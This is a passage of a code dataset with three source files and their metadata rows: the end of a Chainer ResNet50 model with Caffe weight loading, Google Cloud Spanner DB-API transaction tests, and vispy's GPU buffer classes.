                3, 64, 7, 2, 3, initialW=initializers.HeNormal())
            self.bn1 = L.BatchNormalization(64)
            self.res2 = Block(3, 64, 64, 256, 1)
            self.res3 = Block(4, 256, 128, 512)
            self.res4 = Block(6, 512, 256, 1024)
            self.res5 = Block(3, 1024, 512, 2048)
            self.fc = L.Linear(2048, class_num)
        if caffemodel_path is not None:
            # Load pre-trained weights from caffemodel
            self._load_pretrained_weights(caffemodel_path)
        self._class_num = class_num
        self._insize = insize
        self._class_weight = class_weight

    def forward(self, x, compute_cam=False):
        """Compute class scores for a batch of images.

        When ``compute_cam`` is True, additionally returns the res5 feature
        maps and the fc weights (the ingredients for class activation maps).
        """
        h = self.bn1(self.conv1(x))
        h = F.max_pooling_2d(F.relu(h), 3, stride=2)
        h = self.res2(h)
        h = self.res3(h)
        h = self.res4(h)
        h = self.res5(h)
        # Captured before global average pooling so per-location activations
        # are still available for CAM.
        cam_features = h.data
        h = F.average_pooling_2d(h, self._insize//32, stride=1)
        h = self.fc(h)

        if compute_cam:
            cam_weights = self.fc.W.data
            return h, cam_features, cam_weights
        return h

    def __call__(self, x, t):
        """Training entry point: returns the softmax cross-entropy loss and
        reports loss/accuracy to the chainer reporter."""
        h = self.forward(x)
        loss = F.softmax_cross_entropy(h, t, class_weight=self._class_weight)
        chainer.report({'loss': loss, 'accuracy': F.accuracy(h, t)}, self)
        return loss

    @property
    def insize(self):
        return self._insize

    @property
    def class_num(self):
        return self._class_num

    # Functions to load weights from pre-trained ResNet50 caffemodel
    # Reference: https://github.com/chainer/chainer/blob/master/chainer/links/model/vision/resnet.py
    def _load_weights_conv_bn(self, src, dst_conv, dst_bn, bname, cname):
        # The Caffe model keeps BN statistics (BatchNorm layer) and the affine
        # transform (Scale layer) separately; both are merged into the single
        # chainer BatchNormalization link here.
        src_conv = getattr(src, 'res{}_branch{}'.format(bname, cname))
        src_bn = getattr(src, 'bn{}_branch{}'.format(bname, cname))
        src_scale = getattr(src, 'scale{}_branch{}'.format(bname, cname))
        dst_conv.W.data[:] = src_conv.W.data
        dst_bn.avg_mean[:] = src_bn.avg_mean
        dst_bn.avg_var[:] = src_bn.avg_var
        dst_bn.gamma.data[:] = src_scale.W.data
        dst_bn.beta.data[:] = src_scale.bias.b.data

    def _load_weights_bottleneckA(self, dst, src, name):
        # Branch '1' is the projection shortcut; '2a'-'2c' are the main path.
        self._load_weights_conv_bn(src, dst.conv1, dst.bn1, name, '2a')
        self._load_weights_conv_bn(src, dst.conv2, dst.bn2, name, '2b')
        self._load_weights_conv_bn(src, dst.conv3, dst.bn3, name, '2c')
        self._load_weights_conv_bn(src, dst.conv4, dst.bn4, name, '1')

    def _load_weights_bottleneckB(self, dst, src, name):
        self._load_weights_conv_bn(src, dst.conv1, dst.bn1, name, '2a')
        self._load_weights_conv_bn(src, dst.conv2, dst.bn2, name, '2b')
        self._load_weights_conv_bn(src, dst.conv3, dst.bn3, name, '2c')

    def _load_weights_block(self, dst, src, names):
        # The first link in each Block is a BottleNeckA; the rest are
        # BottleNeckB (see Block.__init__).
        for i, (layers, name) in enumerate(zip(dst.children(), names)):
            if i ==0:
                self._load_weights_bottleneckA(layers, src, name)
            else:
                self._load_weights_bottleneckB(layers, src, name)

    def _load_pretrained_weights(self, caffemodel_path):
        # As CaffeFunction uses shortcut symbols,
        # CaffeFunction is imported here.
        from chainer.links.caffe.caffe_function import CaffeFunction
        src = CaffeFunction(caffemodel_path)
        self.conv1.W.data[:] = src.conv1.W.data
        self.conv1.b.data[:] = src.conv1.b.data
        self.bn1.avg_mean[:] = src.bn_conv1.avg_mean
        self.bn1.avg_var[:] = src.bn_conv1.avg_var
        self.bn1.gamma.data[:] = src.scale_conv1.W.data
        self.bn1.beta.data[:] = src.scale_conv1.bias.b.data
        self._load_weights_block(self.res2, src, ['2a', '2b', '2c'])
        self._load_weights_block(self.res3, src, ['3a', '3b', '3c', '3d'])
        self._load_weights_block(self.res4, src, ['4a', '4b', '4c', '4d', '4e', '4f'])
        self._load_weights_block(self.res5, src, ['5a', '5b', '5c'])
| src/models/resnet50.py | 6,020 | Original author: yasunorikudo (https://github.com/yasunorikudo/chainer-ResNet) Load pre-trained weights from caffemodel Functions to load weights from pre-trained ResNet50 caffemodel Reference: https://github.com/chainer/chainer/blob/master/chainer/links/model/vision/resnet.py As CaffeFunction uses shortcut symbols, CaffeFunction is imported here. | 349 | en | 0.781427 |
# Copyright 2021 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import pickle
import pytest
from google.cloud import spanner_v1
from google.cloud.spanner_dbapi.connection import Connection
from . import _helpers
DATABASE_NAME = "dbapi-txn"
DDL_STATEMENTS = (
"""CREATE TABLE contacts (
contact_id INT64,
first_name STRING(1024),
last_name STRING(1024),
email STRING(1024)
)
PRIMARY KEY (contact_id)""",
)
@pytest.fixture(scope="session")
def raw_database(shared_instance, database_operation_timeout):
    """Session-scoped fixture: create the test database, drop it afterwards."""
    db_id = _helpers.unique_id("dbapi-txn")
    bursty_pool = spanner_v1.BurstyPool(labels={"testcase": "database_api"})
    database = shared_instance.database(
        db_id, ddl_statements=DDL_STATEMENTS, pool=bursty_pool,
    )
    create_op = database.create()
    create_op.result(database_operation_timeout)  # raises on failure / timeout.

    yield database

    database.drop()
def clear_table(transaction):
    """Transaction callback: delete every row from the `contacts` table."""
    transaction.execute_update("DELETE FROM contacts WHERE true")
@pytest.fixture(scope="function")
def dbapi_database(raw_database):
    """Per-test fixture: hand out the shared database with an empty
    `contacts` table, and empty it again after the test."""
    raw_database.run_in_transaction(clear_table)

    yield raw_database

    raw_database.run_in_transaction(clear_table)
def test_commit(shared_instance, dbapi_database):
    """Several DML statements in one transaction are all visible after commit."""
    expected_row = (
        1,
        "updated-first-name",
        "last-name",
        "test.email_updated@domen.ru",
    )

    # connect to the test database
    connection = Connection(shared_instance, dbapi_database)
    cursor = connection.cursor()

    # execute several DML statements within one transaction
    cursor.execute(
        """
        INSERT INTO contacts (contact_id, first_name, last_name, email)
        VALUES (1, 'first-name', 'last-name', 'test.email@domen.ru')
        """
    )
    cursor.execute(
        """
        UPDATE contacts
        SET first_name = 'updated-first-name'
        WHERE first_name = 'first-name'
        """
    )
    cursor.execute(
        """
        UPDATE contacts
        SET email = 'test.email_updated@domen.ru'
        WHERE email = 'test.email@domen.ru'
        """
    )
    connection.commit()

    # read the resulting data from the database
    cursor.execute("SELECT * FROM contacts")
    fetched = cursor.fetchall()
    connection.commit()

    assert fetched == [expected_row]

    cursor.close()
    connection.close()
def test_rollback(shared_instance, dbapi_database):
    """Updates executed in a transaction disappear after rollback()."""
    expected_row = (2, "first-name", "last-name", "test.email@domen.ru")

    # connect to the test database
    connection = Connection(shared_instance, dbapi_database)
    cursor = connection.cursor()

    # insert and commit a baseline row
    cursor.execute(
        """
        INSERT INTO contacts (contact_id, first_name, last_name, email)
        VALUES (2, 'first-name', 'last-name', 'test.email@domen.ru')
        """
    )
    connection.commit()

    # execute several DMLs in one transaction, then roll them back
    cursor.execute(
        """
        UPDATE contacts
        SET first_name = 'updated-first-name'
        WHERE first_name = 'first-name'
        """
    )
    cursor.execute(
        """
        UPDATE contacts
        SET email = 'test.email_updated@domen.ru'
        WHERE email = 'test.email@domen.ru'
        """
    )
    connection.rollback()

    # the rolled-back updates must not be visible
    cursor.execute("SELECT * FROM contacts")
    fetched = cursor.fetchall()
    connection.commit()

    assert fetched == [expected_row]

    cursor.close()
    connection.close()
def test_autocommit_mode_change(shared_instance, dbapi_database):
    """Switching `autocommit` on commits the transaction in flight."""
    expected_row = (
        2,
        "updated-first-name",
        "last-name",
        "test.email@domen.ru",
    )

    # connect to the test database
    connection = Connection(shared_instance, dbapi_database)
    cursor = connection.cursor()

    cursor.execute(
        """
        INSERT INTO contacts (contact_id, first_name, last_name, email)
        VALUES (2, 'first-name', 'last-name', 'test.email@domen.ru')
        """
    )
    cursor.execute(
        """
        UPDATE contacts
        SET first_name = 'updated-first-name'
        WHERE first_name = 'first-name'
        """
    )
    # enabling autocommit must commit the statements executed above
    connection.autocommit = True

    # read the resulting data from the database
    cursor.execute("SELECT * FROM contacts")
    fetched = cursor.fetchall()

    assert fetched == [expected_row]

    cursor.close()
    connection.close()
def test_rollback_on_connection_closing(shared_instance, dbapi_database):
    """
    Closing a connection must roll back all of its pending transactions.
    """
    expected_row = (1, "first-name", "last-name", "test.email@domen.ru")

    # connect to the test database
    connection = Connection(shared_instance, dbapi_database)
    cursor = connection.cursor()

    cursor.execute(
        """
        INSERT INTO contacts (contact_id, first_name, last_name, email)
        VALUES (1, 'first-name', 'last-name', 'test.email@domen.ru')
        """
    )
    connection.commit()

    # start a new transaction, then close the connection before committing
    cursor.execute(
        """
        UPDATE contacts
        SET first_name = 'updated-first-name'
        WHERE first_name = 'first-name'
        """
    )
    connection.close()

    # connect again, as the previous connection is no-op after closing
    connection = Connection(shared_instance, dbapi_database)
    cursor = connection.cursor()

    # the uncommitted update must have been rolled back
    cursor.execute("SELECT * FROM contacts")
    fetched = cursor.fetchall()
    connection.commit()

    assert fetched == [expected_row]

    cursor.close()
    connection.close()
def test_results_checksum(shared_instance, dbapi_database):
    """The cursor checksum equals SHA-256 over the pickled rows, in order."""
    connection = Connection(shared_instance, dbapi_database)
    cursor = connection.cursor()

    cursor.execute(
        """
        INSERT INTO contacts (contact_id, first_name, last_name, email)
        VALUES
        (1, 'first-name', 'last-name', 'test.email@domen.ru'),
        (2, 'first-name2', 'last-name2', 'test.email2@domen.ru')
        """
    )
    assert len(connection._statements) == 1
    connection.commit()

    cursor.execute("SELECT * FROM contacts")
    fetched = cursor.fetchall()
    assert len(connection._statements) == 1
    connection.commit()

    # recompute the expected checksum over the two fetched rows
    expected = hashlib.sha256()
    for row in fetched[:2]:
        expected.update(pickle.dumps(row))

    assert cursor._checksum.checksum.digest() == expected.digest()
def test_execute_many(shared_instance, dbapi_database):
    """executemany() works for both DML and parameterized queries, and its
    results don't leak into a following execute()."""
    # connect to the test database
    connection = Connection(shared_instance, dbapi_database)
    cursor = connection.cursor()

    row_data = [
        (1, "first-name", "last-name", "test.email@example.com"),
        (2, "first-name2", "last-name2", "test.email2@example.com"),
    ]
    cursor.executemany(
        """
        INSERT INTO contacts (contact_id, first_name, last_name, email)
        VALUES (%s, %s, %s, %s)
        """,
        row_data,
    )
    connection.commit()

    cursor.executemany(
        """SELECT * FROM contacts WHERE contact_id = @a1""", ({"a1": 1}, {"a1": 2}),
    )
    fetched = cursor.fetchall()
    connection.commit()

    assert len(fetched) == len(row_data)
    for found, expected in zip(fetched, row_data):
        assert found[0] == expected[0]

    # checking that execute() and executemany()
    # results are not mixed together
    cursor.execute(
        """
        SELECT * FROM contacts WHERE contact_id = 1
        """,
    )
    single = cursor.fetchone()
    connection.commit()

    assert single[0] == 1
    connection.close()
def test_DDL_autocommit(shared_instance, dbapi_database):
    """DDL statements in autocommit mode are executed immediately."""
    connection = Connection(shared_instance, dbapi_database)
    connection.autocommit = True

    cursor = connection.cursor()
    cursor.execute(
        """
        CREATE TABLE Singers (
            SingerId INT64 NOT NULL,
            Name STRING(1024),
        ) PRIMARY KEY (SingerId)
        """
    )
    connection.close()

    # if the previous DDL wasn't committed, the next DROP TABLE
    # statement will fail with a ProgrammingError
    connection = Connection(shared_instance, dbapi_database)
    cursor = connection.cursor()

    cursor.execute("DROP TABLE Singers")
    connection.commit()
def test_DDL_commit(shared_instance, dbapi_database):
    """DDL statements outside autocommit mode run on calling `commit()`."""
    connection = Connection(shared_instance, dbapi_database)
    cursor = connection.cursor()

    cursor.execute(
        """
        CREATE TABLE Singers (
            SingerId INT64 NOT NULL,
            Name STRING(1024),
        ) PRIMARY KEY (SingerId)
        """
    )
    connection.commit()
    connection.close()

    # if the previous DDL wasn't committed, the next DROP TABLE
    # statement will fail with a ProgrammingError
    connection = Connection(shared_instance, dbapi_database)
    cursor = connection.cursor()

    cursor.execute("DROP TABLE Singers")
    connection.commit()
def test_ping(shared_instance, dbapi_database):
    """Ensure a freshly opened connection passes its own validation check."""
    connection = Connection(shared_instance, dbapi_database)
    connection.validate()
    connection.close()
def test_update_non_autocommit(shared_instance, dbapi_database):
    """Check that an UPDATE outside autocommit mode reports the number of
    affected rows (via ``cursor.rowcount``) once committed."""
    setup_rows = """
    INSERT INTO contacts (contact_id, first_name, last_name, email)
    VALUES
    (1, 'first-name', 'last-name', 'get@domen.ru'),
    (2, 'first-name', 'last-name', 'get@domen.ru'),
    (3, 'first-name', 'last-name', 'ignore@domen.ru')
    """
    conn = Connection(shared_instance, dbapi_database)
    cursor = conn.cursor()
    cursor.execute(setup_rows)
    conn.commit()
    # only the two 'get@domen.ru' rows match the WHERE clause
    cursor.execute(
        "UPDATE contacts SET first_name='changed' WHERE email='get@domen.ru'"
    )
    conn.commit()
    assert cursor.rowcount == 2
| tests/system/test_dbapi.py | 9,907 | Check that DDLs in autocommit mode are immediately executed.
Check that DDLs in commit mode are executed on calling `commit()`.
Test auto committing a transaction on `autocommit` mode change.
Test committing a transaction with several statements.
Check connection validation method.
Test that results checksum is calculated properly.
Test rollbacking a transaction with several statements.
When closing a connection all the pending transactions
must be rollbacked. Testing if it's working this way.
Copyright 2021 Google LLC All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. raises on failure / timeout. connect to the test database execute several DML statements within one transaction read the resulting data from the database connect to the test database execute several DMLs with one transaction read the resulting data from the database connect to the test database read the resulting data from the database connect to the test database connect again, as the previous connection is no-op after closing read the resulting data from the database connect to the test database checking that execute() and executemany() results are not mixed together if previous DDL wasn't committed, the next DROP TABLE statement will fail with a ProgrammingError if previous DDL wasn't committed, the next DROP TABLE statement will fail with a ProgrammingError | 1,841 | en | 0.891344 |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2015, Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
import numpy as np
from os import path as op
from traceback import extract_stack, format_list
import weakref
from . globject import GLObject
from ..util import logger
from ..ext.six import string_types
# ------------------------------------------------------------ Buffer class ---
class Buffer(GLObject):
    """ Generic GPU buffer.
    A generic buffer is an interface used to upload data to a GPU array buffer
    (ARRAY_BUFFER or ELEMENT_ARRAY_BUFFER). It keeps track of
    buffer size but does not have any CPU storage. You can consider it as
    write-only.
    The `set_data` is a deferred operation: you can call it even if an OpenGL
    context is not available. The `update` function is responsible to upload
    pending data to GPU memory and requires an active GL context.
    The Buffer class only deals with data in terms of bytes; it is not
    aware of data type or element size.
    Parameters
    ----------
    data : ndarray | None
        Buffer data.
    nbytes : int | None
        Buffer byte size.
    """
    def __init__(self, data=None, nbytes=None):
        GLObject.__init__(self)
        self._views = [] # Views on this buffer (stored using weakrefs)
        self._valid = True # To invalidate buffer views
        self._nbytes = 0 # Bytesize in bytes, set in resize_bytes()
        # Set data: `data` and `nbytes` are mutually exclusive — data implies
        # its own byte size, nbytes alone just allocates storage.
        if data is not None:
            if nbytes is not None:
                raise ValueError("Cannot specify both data and nbytes.")
            self.set_data(data, copy=False)
        elif nbytes is not None:
            self.resize_bytes(nbytes)
    @property
    def nbytes(self):
        """ Buffer size in bytes """
        return self._nbytes
    def set_subdata(self, data, offset=0, copy=False):
        """ Set a sub-region of the buffer (deferred operation).
        Parameters
        ----------
        data : ndarray
            Data to be uploaded
        offset: int
            Offset in buffer where to start copying data (in bytes)
        copy: bool
            Since the operation is deferred, data may change before
            data is actually uploaded to GPU memory.
            Asking explicitly for a copy will prevent this behavior.
        """
        data = np.array(data, copy=copy)
        nbytes = data.nbytes
        if offset < 0:
            raise ValueError("Offset must be positive")
        elif (offset + nbytes) > self._nbytes:
            raise ValueError("Data does not fit into buffer")
        # If the whole buffer is to be written, we clear any pending data
        # (because they will be overwritten anyway): queueing SIZE first lets
        # the GLIR consumer drop earlier DATA commands for this buffer.
        if nbytes == self._nbytes and offset == 0:
            self._glir.command('SIZE', self._id, nbytes)
        self._glir.command('DATA', self._id, offset, data)
    def set_data(self, data, copy=False):
        """ Set data in the buffer (deferred operation).
        This completely resets the size and contents of the buffer.
        Parameters
        ----------
        data : ndarray
            Data to be uploaded
        copy: bool
            Since the operation is deferred, data may change before
            data is actually uploaded to GPU memory.
            Asking explicitly for a copy will prevent this behavior.
        """
        data = np.array(data, copy=copy)
        nbytes = data.nbytes
        if nbytes != self._nbytes:
            self.resize_bytes(nbytes)
        else:
            # Use SIZE to discard any previous data setting
            self._glir.command('SIZE', self._id, nbytes)
        if nbytes: # Only set data if there *is* data
            self._glir.command('DATA', self._id, 0, data)
    def resize_bytes(self, size):
        """ Resize this buffer (deferred operation).
        Parameters
        ----------
        size : int
            New buffer size in bytes.
        """
        self._nbytes = size
        self._glir.command('SIZE', self._id, size)
        # Invalidate any view on this buffer: a view's offset/size are
        # meaningless after a resize. Dead weakrefs are discarded as well.
        for view in self._views:
            if view() is not None:
                view()._valid = False
        self._views = []
# -------------------------------------------------------- DataBuffer class ---
class DataBuffer(Buffer):
    """ GPU data buffer that is aware of data type and elements size
    Parameters
    ----------
    data : ndarray | None
        Buffer data.
    """
    def __init__(self, data=None):
        self._size = 0 # number of elements in buffer, set in resize_bytes()
        self._dtype = None      # numpy dtype, cached by set_data()
        self._stride = 0        # byte stride of the last axis
        self._itemsize = 0      # bytes per element
        self._last_dim = None   # used by VertexBuffer to lock component count
        Buffer.__init__(self, data)
    def _prepare_data(self, data):
        # Can be overridden by subclasses to coerce/validate incoming data.
        if not isinstance(data, np.ndarray):
            raise TypeError("DataBuffer data must be numpy array.")
        return data
    def set_subdata(self, data, offset=0, copy=False, **kwargs):
        """ Set a sub-region of the buffer (deferred operation).
        Parameters
        ----------
        data : ndarray
            Data to be uploaded
        offset: int
            Offset in buffer where to start copying data (in bytes)
        copy: bool
            Since the operation is deferred, data may change before
            data is actually uploaded to GPU memory.
            Asking explicitly for a copy will prevent this behavior.
        **kwargs : dict
            Additional keyword arguments.
        """
        data = self._prepare_data(data, **kwargs)
        # Public offset is expressed in elements; the base Buffer works in
        # bytes, hence the conversion here.
        offset = offset * self.itemsize
        Buffer.set_subdata(self, data=data, offset=offset, copy=copy)
    def set_data(self, data, copy=False, **kwargs):
        """ Set data (deferred operation)
        Parameters
        ----------
        data : ndarray
            Data to be uploaded
        copy: bool
            Since the operation is deferred, data may change before
            data is actually uploaded to GPU memory.
            Asking explicitly for a copy will prevent this behavior.
        **kwargs : dict
            Additional arguments.
        """
        data = self._prepare_data(data, **kwargs)
        # Cache type information so element-based offsets and views work.
        self._dtype = data.dtype
        self._stride = data.strides[-1]
        self._itemsize = self._dtype.itemsize
        Buffer.set_data(self, data=data, copy=copy)
    @property
    def dtype(self):
        """ Buffer dtype """
        return self._dtype
    @property
    def offset(self):
        """ Buffer offset (in bytes) relative to base """
        return 0
    @property
    def stride(self):
        """ Stride of data in memory """
        return self._stride
    @property
    def size(self):
        """ Number of elements in the buffer """
        return self._size
    @property
    def itemsize(self):
        """ The total number of bytes required to store the array data """
        return self._itemsize
    @property
    def glsl_type(self):
        """ GLSL declaration strings required for a variable to hold this data.
        """
        if self.dtype is None:
            return None
        # Data is stored as a structured dtype; field 0's shape gives the
        # number of components, which maps to float/int or vecN in GLSL.
        dtshape = self.dtype[0].shape
        n = dtshape[0] if dtshape else 1
        if n > 1:
            dtype = 'vec%d' % n
        else:
            dtype = 'float' if 'f' in self.dtype[0].base.kind else 'int'
        return 'attribute', dtype
    def resize_bytes(self, size):
        """ Resize the buffer (in-place, deferred operation)
        Parameters
        ----------
        size : integer
            New buffer size in bytes
        Notes
        -----
        This clears any pending operations.
        """
        Buffer.resize_bytes(self, size)
        self._size = size // self.itemsize
    def __getitem__(self, key):
        """ Create a view on this buffer. """
        view = DataBufferView(self, key)
        # Store only a weakref so views do not keep this buffer alive.
        self._views.append(weakref.ref(view))
        return view
    def __setitem__(self, key, data):
        """ Set data (deferred operation) """
        # Setting a whole field of the buffer: only allowed if we have CPU
        # storage. Note this case (key is string) only happen with base buffer
        if isinstance(key, string_types):
            raise ValueError("Cannot set non-contiguous data on buffer")
        # Setting one or several elements
        elif isinstance(key, int):
            if key < 0:
                key += self.size
            if key < 0 or key > self.size:
                raise IndexError("Buffer assignment index out of range")
            start, stop, step = key, key + 1, 1
        elif isinstance(key, slice):
            start, stop, step = key.indices(self.size)
            if stop < start:
                start, stop = stop, start
        elif key == Ellipsis:
            start, stop, step = 0, self.size, 1
        else:
            raise TypeError("Buffer indices must be integers or strings")
        # Contiguous update?
        if step != 1:
            raise ValueError("Cannot set non-contiguous data on buffer")
        # Make sure data is an array
        if not isinstance(data, np.ndarray):
            data = np.array(data, dtype=self.dtype, copy=False)
        # Make sure data is big enough; short data is tiled by np.resize
        if data.size < stop - start:
            data = np.resize(data, stop - start)
        elif data.size > stop - start:
            raise ValueError('Data too big to fit GPU data.')
        # Set data; offset stays in elements because set_subdata() converts
        # it to bytes itself.
        offset = start # * self.itemsize
        self.set_subdata(data=data, offset=offset, copy=True)
    def __repr__(self):
        return ("<%s size=%s last_dim=%s>" %
                (self.__class__.__name__, self.size, self._last_dim))
class DataBufferView(DataBuffer):
    """ View on a sub-region of a DataBuffer.
    Parameters
    ----------
    base : DataBuffer
        The buffer accessed by this view.
    key : str, int, slice, or Ellpsis
        The index into the base buffer that defines a sub-region of the buffer
        to view. String arguments select a single field from multi-field
        dtypes, and other allowed types select a subset of rows.
    Notes
    -----
    It is generally not necessary to instantiate this class manually; use
    ``base_buffer[key]`` instead.
    """
    # Note that this class is a bit evil: it is a subclass of GLObject,
    # Buffer and DataBuffer, but any of these __init__'s are not called ...
    def __init__(self, base, key):
        # Note how this never runs the super's __init__,
        # all attributes must thus be set here ...
        self._base = base
        self._key = key
        self._stride = base.stride
        # String key: view a single field of a structured dtype; the view
        # spans all elements of the base buffer.
        if isinstance(key, string_types):
            self._dtype = base.dtype[key]
            self._offset = base.dtype.fields[key][1]
            self._nbytes = base.size * self._dtype.itemsize
            self._size = base.size
            self._itemsize = self._dtype.itemsize
            return
        # Otherwise the key must select a contiguous range of rows.
        if isinstance(key, int):
            if key < 0:
                key += base.size
            if key < 0 or key > base.size:
                raise IndexError("Buffer assignment index out of range")
            start, stop, step = key, key + 1, 1
        elif isinstance(key, slice):
            start, stop, step = key.indices(base.size)
            if stop < start:
                start, stop = stop, start
        elif key == Ellipsis:
            start, stop, step = 0, base.size, 1
        else:
            raise TypeError("Buffer indices must be integers or strings")
        if step != 1:
            raise ValueError("Cannot access non-contiguous data")
        self._itemsize = base.itemsize
        self._offset = start * self.itemsize
        self._size = stop - start
        self._dtype = base.dtype
        self._nbytes = self.size * self.itemsize
    @property
    def glir(self):
        # Delegate the GLIR queue to the base buffer: views own no GL object.
        return self._base.glir
    @property
    def id(self):
        return self._base.id
    @property
    def _last_dim(self):
        return self._base._last_dim
    def set_subdata(self, data, offset=0, copy=False, **kwargs):
        # Views are read-only handles; data must be set on the base buffer.
        raise RuntimeError("Cannot set data on buffer view.")
    def set_data(self, data, copy=False, **kwargs):
        raise RuntimeError("Cannot set data on buffer view.")
    @property
    def offset(self):
        """ Buffer offset (in bytes) relative to base """
        return self._offset
    @property
    def base(self):
        """Buffer base if this buffer is a view on another buffer. """
        return self._base
    def resize_bytes(self, size):
        raise RuntimeError("Cannot resize buffer view.")
    def __getitem__(self, key):
        raise RuntimeError("Can only access data from a base buffer")
    def __setitem__(self, key, data):
        raise RuntimeError("Cannot set data on Buffer view")
    def __repr__(self):
        return ("<DataBufferView on %r at offset=%d size=%d>" %
                (self.base, self.offset, self.size))
# ------------------------------------------------------ VertexBuffer class ---
class VertexBuffer(DataBuffer):
    """ Buffer for vertex attribute data
    Parameters
    ----------
    data : ndarray
        Buffer data (optional)
    """
    _GLIR_TYPE = 'VertexBuffer'
    def _prepare_data(self, data, convert=False):
        # Build a structured view of the data if:
        # -> it is not already a structured array
        # -> shape if 1-D or last dimension is 1,2,3 or 4
        if isinstance(data, list):
            data = np.array(data, dtype=np.float32)
        if not isinstance(data, np.ndarray):
            raise ValueError('Data must be a ndarray (got %s)' % type(data))
        if data.dtype.isbuiltin:
            if convert is True:
                data = data.astype(np.float32)
            # 64-bit types are rejected because GL attributes are 32-bit.
            if data.dtype in (np.float64, np.int64):
                raise TypeError('data must be 32-bit not %s'
                                % data.dtype)
            # Component count comes from the last axis (vec2/vec3/vec4);
            # anything else is treated as scalar attributes.
            c = data.shape[-1] if data.ndim > 1 else 1
            if c in [2, 3, 4]:
                if not data.flags['C_CONTIGUOUS']:
                    # The structured .view() below requires contiguity, so
                    # warn (pointing at the caller) and copy.
                    logger.warning('Copying discontiguous data for struct '
                                   'dtype:\n%s' % _last_stack_str())
                    data = data.copy()
            else:
                c = 1
            # Once a component count is established, later uploads must match.
            if self._last_dim and c != self._last_dim:
                raise ValueError('Last dimension should be %s not %s'
                                 % (self._last_dim, c))
            data = data.view(dtype=[('f0', data.dtype.base, c)])
            self._last_dim = c
        return data
def _last_stack_str():
"""Print stack trace from call that didn't originate from here"""
stack = extract_stack()
for s in stack[::-1]:
if op.join('vispy', 'gloo', 'buffer.py') not in __file__:
break
return format_list([s])[0]
# ------------------------------------------------------- IndexBuffer class ---
class IndexBuffer(DataBuffer):
    """ Buffer for index data
    Parameters
    ----------
    data : ndarray | None
        Buffer data.
    """
    _GLIR_TYPE = 'IndexBuffer'
    def __init__(self, data=None):
        DataBuffer.__init__(self, data)
        # Index buffers are always flat 1-D element lists.
        self._last_dim = 1
    def _prepare_data(self, data, convert=False):
        """Validate index data; lists are promoted to uint32 arrays.

        With ``convert=True`` any builtin dtype is cast to uint32; otherwise
        only uint8/uint16/uint32 are accepted.
        """
        if isinstance(data, list):
            data = np.array(data, dtype=np.uint32)
        if not isinstance(data, np.ndarray):
            raise ValueError('Data must be a ndarray (got %s)' % type(data))
        if not data.dtype.isbuiltin:
            raise TypeError("Element buffer dtype cannot be structured")
        else:
            if convert:
                # BUG FIX: compare dtypes with ``!=`` instead of ``is not``.
                # A dtype instance is never the same object as the np.uint32
                # scalar type, so the old identity test was always True and
                # forced a copy even when the data was already uint32.
                if data.dtype != np.uint32:
                    data = data.astype(np.uint32)
            else:
                if data.dtype not in [np.uint32, np.uint16, np.uint8]:
                    raise TypeError("Invalid dtype for IndexBuffer: %r" %
                                    data.dtype)
        return data
| vispy/gloo/buffer.py | 16,293 | Generic GPU buffer.
A generic buffer is an interface used to upload data to a GPU array buffer
(ARRAY_BUFFER or ELEMENT_ARRAY_BUFFER). It keeps track of
buffer size but does not have any CPU storage. You can consider it as
write-only.
The `set_data` is a deferred operation: you can call it even if an OpenGL
context is not available. The `update` function is responsible to upload
pending data to GPU memory and requires an active GL context.
The Buffer class only deals with data in terms of bytes; it is not
aware of data type or element size.
Parameters
----------
data : ndarray | None
Buffer data.
nbytes : int | None
Buffer byte size.
GPU data buffer that is aware of data type and elements size
Parameters
----------
data : ndarray | None
Buffer data.
View on a sub-region of a DataBuffer.
Parameters
----------
base : DataBuffer
The buffer accessed by this view.
key : str, int, slice, or Ellpsis
The index into the base buffer that defines a sub-region of the buffer
to view. String arguments select a single field from multi-field
dtypes, and other allowed types select a subset of rows.
Notes
-----
It is generally not necessary to instantiate this class manually; use
``base_buffer[key]`` instead.
Buffer for index data
Parameters
----------
data : ndarray | None
Buffer data.
Buffer for vertex attribute data
Parameters
----------
data : ndarray
Buffer data (optional)
Create a view on this buffer.
Set data (deferred operation)
Print stack trace from call that didn't originate from here
Buffer base if this buffer is a view on another buffer.
Buffer dtype
GLSL declaration strings required for a variable to hold this data.
The total number of bytes required to store the array data
Buffer size in bytes
Buffer offset (in bytes) relative to base
Buffer offset (in bytes) relative to base
Resize this buffer (deferred operation).
Parameters
----------
size : int
New buffer size in bytes.
Resize the buffer (in-place, deferred operation)
Parameters
----------
size : integer
New buffer size in bytes
Notes
-----
This clears any pending operations.
Set data in the buffer (deferred operation).
This completely resets the size and contents of the buffer.
Parameters
----------
data : ndarray
Data to be uploaded
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
Set data (deferred operation)
Parameters
----------
data : ndarray
Data to be uploaded
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
**kwargs : dict
Additional arguments.
Set a sub-region of the buffer (deferred operation).
Parameters
----------
data : ndarray
Data to be uploaded
offset: int
Offset in buffer where to start copying data (in bytes)
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
Set a sub-region of the buffer (deferred operation).
Parameters
----------
data : ndarray
Data to be uploaded
offset: int
Offset in buffer where to start copying data (in bytes)
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
**kwargs : dict
Additional keyword arguments.
Number of elements in the buffer
Stride of data in memory
